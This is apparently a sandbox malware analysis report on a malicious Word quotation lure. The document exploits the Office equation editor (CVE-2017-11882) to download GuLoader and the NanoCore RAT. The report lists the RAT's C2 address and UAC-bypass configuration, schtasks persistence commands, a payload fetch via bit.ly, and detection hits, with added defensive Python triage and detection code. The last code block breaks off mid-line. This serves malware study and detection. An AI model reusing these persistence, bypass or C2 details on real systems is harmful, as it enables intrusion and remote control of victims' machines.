
Analysis Report QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc

Overview

General Information

Sample Name:QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
Analysis ID:358179
MD5:bc1c94e783483f1c218efb5dcaf5f67e
SHA1:7747c98d3d2da16f6e8b2fc56bd0e84532e3a543
SHA256:d1e84cab5bf5eadd159b04374dce5a78a0e93156086475d41ad86665357dfc66
Tags:doc

Detection

Nanocore GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected Nanocore RAT
C2 URLs / IPs found in malware configuration
Connects to a URL shortener service
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2200 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2308 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • 69577.exe (PID: 2680 cmdline: C:\Users\Public\69577.exe MD5: A6AD1C3046A3CF0C6992507F2886AAB3)
      • RegAsm.exe (PID: 2916 cmdline: C:\Users\Public\69577.exe MD5: 246BB0F8D68A463FD17C235DEB5491C0)
      • RegAsm.exe (PID: 2488 cmdline: C:\Users\Public\69577.exe MD5: 246BB0F8D68A463FD17C235DEB5491C0)
        • schtasks.exe (PID: 3060 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • schtasks.exe (PID: 2276 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2272 cmdline: taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • RegAsm.exe (PID: 1904 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0 MD5: 246BB0F8D68A463FD17C235DEB5491C0)
    • smtpsvc.exe (PID: 2348 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 246BB0F8D68A463FD17C235DEB5491C0)
  • filename1.exe (PID: 1552 cmdline: 'C:\Users\user\subfolder1\filename1.exe' MD5: A6AD1C3046A3CF0C6992507F2886AAB3)
  • smtpsvc.exe (PID: 2560 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 246BB0F8D68A463FD17C235DEB5491C0)
  • cleanup

Malware Configuration

Threatname: NanoCore

{
  "Version": "1.2.2.0",
  "Mutex": "92421eeb-c456-44c2-ab8d-5a66d7e5ab97",
  "Group": "Company",
  "Domain1": "194.5.98.202",
  "Domain2": "",
  "Port": 4488,
  "RunOnStartup": "Enable",
  "RequestElevation": "Disable",
  "BypassUAC": "Enable",
  "ClearZoneIdentifier": "Enable",
  "ClearAccessControl": "Disable",
  "SetCriticalProcess": "Disable",
  "PreventSystemSleep": "Enable",
  "ActivateAwayMode": "Disable",
  "EnableDebugMode": "Disable",
  "RunDelay": 0,
  "ConnectDelay": 4000,
  "RestartDelay": 5000,
  "TimeoutInterval": 5000,
  "KeepAliveTimeout": 30000,
  "MutexTimeout": 5000,
  "LanTimeout": 2500,
  "WanTimeout": 8000,
  "BufferSize": "ffff0000",
  "MaxPacketSize": "0000a000",
  "GCThreshold": "0000a000",
  "UseCustomDNS": "Enable",
  "PrimaryDNSServer": "8.8.8.8",
  "BackupDNSServer": "8.8.4.4",
  "BypassUserAccountControlData": "(scheduled-task XML, shown decoded below)"
}

BypassUserAccountControlData, decoded from the escaped string (the extractor's string ends at "</Task" without the closing ">"):

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>false</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>4</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"#EXECUTABLEPATH"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task
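Added example, not the report's configuration extractor: a triage pass over the configuration listed above. It pulls the C2 endpoint from the DomainN/Port fields, lists the posture-changing settings that are enabled, and parses the BypassUserAccountControlData task template for its RunLevel, LogonType and Command. Field values are copied from the report; the task XML is the report's template with the Settings block abridged and the cut-off closing tag completed so that it parses, and the field names are those of the extractor output.

```python
"""Triage of the NanoCore configuration listed above.

Added example; not the report's configuration extractor. Field values are
copied from the report. TASK_XML is the report's BypassUserAccountControlData
template with the Settings block abridged and the cut-off closing tag
completed so that it parses (constructed for this example).
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <Hidden>false</Hidden>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"#EXECUTABLEPATH"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task>"""

CONFIG = {
    "Version": "1.2.2.0",
    "Mutex": "92421eeb-c456-44c2-ab8d-5a66d7e5ab97",
    "Group": "Company",
    "Domain1": "194.5.98.202", "Domain2": "", "Port": 4488,
    "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable",
    "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable",
    "SetCriticalProcess": "Disable", "UseCustomDNS": "Enable",
    "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4",
    "BypassUserAccountControlData": TASK_XML,
}

# Settings that change the host's security posture when set to "Enable".
WATCHLIST = ("RunOnStartup", "BypassUAC", "ClearZoneIdentifier",
             "ClearAccessControl", "SetCriticalProcess", "UseCustomDNS")


def c2_endpoints(cfg):
    """(host, port) for each populated DomainN field; both share one Port."""
    return [(cfg[k], int(cfg["Port"])) for k in ("Domain1", "Domain2") if cfg.get(k)]


def risky_settings(cfg):
    return sorted(k for k in WATCHLIST if cfg.get(k) == "Enable")


def task_findings(xml_text):
    """Fields that matter from the UAC-bypass task template."""
    # The value is already a decoded str, so the UTF-16 declaration describes
    # bytes we do not have; drop it before parsing.
    body = re.sub(r"^<\?xml[^>]*\?>\s*", "", xml_text)
    root = ET.fromstring(body)

    def text(path):
        return (root.findtext(path, default="", namespaces=TASK_NS) or "").strip()

    run_level = text("t:Principals/t:Principal/t:RunLevel")
    return {
        "run_level": run_level,
        "logon_type": text("t:Principals/t:Principal/t:LogonType"),
        "hidden": text("t:Settings/t:Hidden"),
        "command": text("t:Actions/t:Exec/t:Command"),
        "arguments": text("t:Actions/t:Exec/t:Arguments"),
        "elevation_requested": run_level == "HighestAvailable",
    }


def triage(cfg):
    return {
        "c2": c2_endpoints(cfg),
        "mutex": cfg["Mutex"],
        "enabled": risky_settings(cfg),
        "custom_dns": ([cfg["PrimaryDNSServer"], cfg["BackupDNSServer"]]
                       if cfg.get("UseCustomDNS") == "Enable" else []),
        "task": task_findings(cfg["BypassUserAccountControlData"]),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(CONFIG), indent=2))
```

Two points worth keeping in mind when reading the output: RunLevel HighestAvailable only yields an elevated task when the logged-on user is a member of Administrators, otherwise the task runs at the user's own level; and UseCustomDNS with 8.8.8.8/8.8.4.4 means name lookups by the implant bypass the organisation's resolvers and their logs.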

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost
00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
(5 further memory-dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.RegAsm.exe.130000.1.raw.unpack | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
6.2.RegAsm.exe.130000.1.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
6.2.RegAsm.exe.144629.2.raw.unpack | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xb184:$x1: NanoCore.ClientPluginHost
  • 0xb1b1:$x2: IClientNetworkHost
6.2.RegAsm.exe.144629.2.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xb184:$x2: NanoCore.ClientPluginHost
  • 0xc25f:$s4: PipeCreated
  • 0xb19e:$s5: IClientLoggingHost
6.2.RegAsm.exe.144629.2.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
(20 further unpacked-PE entries not shown)

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2308, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2680
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 67.199.248.10, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2308, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2308, TargetFilename: C:\Users\Public\69577.exe
Sigma detected: NanoCore
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 2488, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\Public\69577.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentProcessId: 2488, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp', ProcessId: 3060
Sigma detected: Executables Started in Suspicious Folder
Source: Process started | Author: Florian Roth | Data: same process-start event as for "Droppers Exploiting CVE-2017-11882" above (C:\Users\Public\69577.exe, ProcessId 2680, ParentImage EQNEDT32.EXE, ParentProcessId 2308)
Sigma detected: Execution in Non-Executable Folder
Source: Process started | Author: Florian Roth | Data: same process-start event as for "Droppers Exploiting CVE-2017-11882" above (C:\Users\Public\69577.exe, ProcessId 2680, ParentImage EQNEDT32.EXE, ParentProcessId 2308)
Sigma detected: Suspicious Program Location Process Starts
Source: Process started | Author: Florian Roth | Data: same process-start event as for "Droppers Exploiting CVE-2017-11882" above (C:\Users\Public\69577.exe, ProcessId 2680, ParentImage EQNEDT32.EXE, ParentProcessId 2308)
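Added example, not Joe Sandbox's or the Sigma project's code: the process-creation checks behind the hits above, run over events constructed from this report's Startup tree. Besides the equation-editor-child, suspicious-folder and schtasks-from-Temp rules it adds an image/command-line mismatch check, because both RegAsm.exe instances in the Startup tree carry the dropper's command line (C:\Users\Public\69577.exe), which is consistent with the "Creates a process in suspended mode" and "Writes to foreign memory regions" signatures. The event record shape (pid, image, cmdline, parent_image) and the benign notepad.exe control event are assumptions.

```python
"""Process-creation checks mirroring this report's Sigma hits.

Added example; not Joe Sandbox's or the Sigma project's code. The events
below are constructed from the report's Startup tree (PIDs, images and
command lines copied from it); the record shape is an assumption about a
generic process-creation log such as Sysmon event 1.
"""
import ntpath
import re

EVENTS = [
    {"pid": 2308,
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r"'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding",
     "parent_image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"},
    {"pid": 2680,
     "image": r"C:\Users\Public\69577.exe",
     "cmdline": r"C:\Users\Public\69577.exe",
     "parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"},
    {"pid": 2488,  # RegAsm.exe running with the dropper's command line
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe",
     "cmdline": r"C:\Users\Public\69577.exe",
     "parent_image": r"C:\Users\Public\69577.exe"},
    {"pid": 3060,
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'",
     "parent_image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"},
    {"pid": 4000,  # constructed benign control, not from the report
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
]

# Directories a user-writable dropper lands in; matched as path fragments.
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\appdata\\local\\temp\\")


def _base(path):
    return ntpath.basename(path).lower()


def _first_token(cmdline):
    """The executable part of a command line, honouring a quoted first token."""
    s = cmdline.strip()
    if s and s[0] in "'\"":
        end = s.find(s[0], 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""


def spawned_by_equation_editor(ev):
    # EQNEDT32.EXE has no legitimate reason to start child processes.
    return _base(ev["parent_image"]) == "eqnedt32.exe"


def runs_from_suspicious_folder(ev):
    img = ev["image"].lower()
    return any(d in img for d in SUSPICIOUS_DIRS)


def image_cmdline_mismatch(ev):
    # A process whose command line names a different executable than its
    # image is the footprint of code injected into a suspended process.
    return _base(_first_token(ev["cmdline"])) != _base(ev["image"])


def schtasks_xml_from_temp(ev):
    cl = ev["cmdline"].lower()
    return (_base(ev["image"]) == "schtasks.exe" and "/create" in cl
            and re.search(r"/xml\s+['\"]?[^'\"]*\\temp\\", cl) is not None)


RULES = [
    ("Droppers Exploiting CVE-2017-11882", spawned_by_equation_editor),
    ("Executables Started in Suspicious Folder", runs_from_suspicious_folder),
    ("Image/command-line mismatch (possible hollowing)", image_cmdline_mismatch),
    ("Scheduled temp file as task from temp location", schtasks_xml_from_temp),
]


def run_checks(events):
    """Return (pid, rule name) for every event/rule pair that fires."""
    return [(ev["pid"], name) for ev in events for name, check in RULES if check(ev)]


def hits_for(findings, pid):
    return {name for p, name in findings if p == pid}


if __name__ == "__main__":
    for pid, name in run_checks(EVENTS):
        print(pid, name)
```

The mismatch rule is the one to tune before deploying: launchers that legitimately exec through a different image (shims, some installers) will hit it, so pair it with the parent or with a list of commonly hollowed .NET hosts such as RegAsm.exe rather than using it alone.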

Signature Overview

AV Detection:

Found malware configuration
Source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp | Malware Configuration Extractor: NanoCore (full configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt | VirusTotal: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt | ReversingLabs: Detection: 27%
Source: C:\Users\user\subfolder1\filename1.exe | ReversingLabs: Detection: 27%
Source: C:\Users\Public\69577.exe | ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc | VirusTotal: Detection: 39%
Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc | ReversingLabs: Detection: 25%
Yara detected Nanocore RAT
Source: Yara match | File source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
Source: Yara match | File source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE
Source: 6.2.RegAsm.exe.140000.3.unpack | Avira: Label: TR/NanoCore.fadte

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\69577.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
      Source: Binary string: .pdb< source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: ystem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb9FFP source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: !symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: System.pdb H~t source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: nWindows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: WT3UpC:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: < indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: < indows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb\cs source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: RegAsm.pdb source: smtpsvc.exe, smtpsvc.exe.6.dr
      Source: Binary string: !C:\Windows\System.pdb@= source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: Wm.pdb source: RegAsm.exe, 00000006.00000002.2383056342.00000000203CD000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: System.pdb8 source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: mscorrc.pdb source: RegAsm.exe, 00000006.00000002.2371259124.00000000000D0000.00000002.00000001.sdmp
      Source: Binary string: C:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\
Source: global traffic | DNS query: name: bit.ly
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 5.79.72.163:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 67.199.248.10:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 194.5.98.202:4488
Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 194.5.98.202:4488
Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 194.5.98.202:4488
Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 194.5.98.202:4488
Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 194.5.98.202:4488
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: 194.5.98.202
Connects to a URL shortener service
Source: unknown | DNS query: name: bit.ly (two queries)
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 194.5.98.202:4488
Source: Joe Sandbox View | IP Address: 67.199.248.10
Source: Joe Sandbox View | ASN Name: GOOGLE-PRIVATE-CLOUDUS
Source: Joe Sandbox View | ASN Name: DANILENKODE
Source: global traffic | HTTP traffic detected: GET /2ZKf4aq HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: bit.ly | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 194.5.98.202 (reported 50 times)
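Added example, not Snort's or Joe Sandbox's code, tying together the three kinds of network evidence in this section: it parses Snort alert lines in the report's format, counts connections per destination, and flags destinations that no DNS answer ever returned or that use a non-standard port, which is the logic behind the "TCP traffic detected without corresponding DNS query" lines. Alert lines and connection tuples are copied from the report; the bit.ly to 67.199.248.10 answer and the set of standard ports are constructed, since the report records the query and the subsequent connection with Host: bit.ly but not the DNS response.

```python
"""Correlating this report's network evidence.

Added example; not Snort's or Joe Sandbox's code. The alert lines and the
connection tuples are copied from the report. The DNS answer for bit.ly is
constructed: the report records the query and the following connection to
67.199.248.10:80 with Host: bit.ly, not the response itself.
"""
import re
from collections import defaultdict

SNORT_RE = re.compile(
    r"^(?P<sid>\d+)\s+(?P<msg>.+?)\s+(?P<size>\d+)B\s+"
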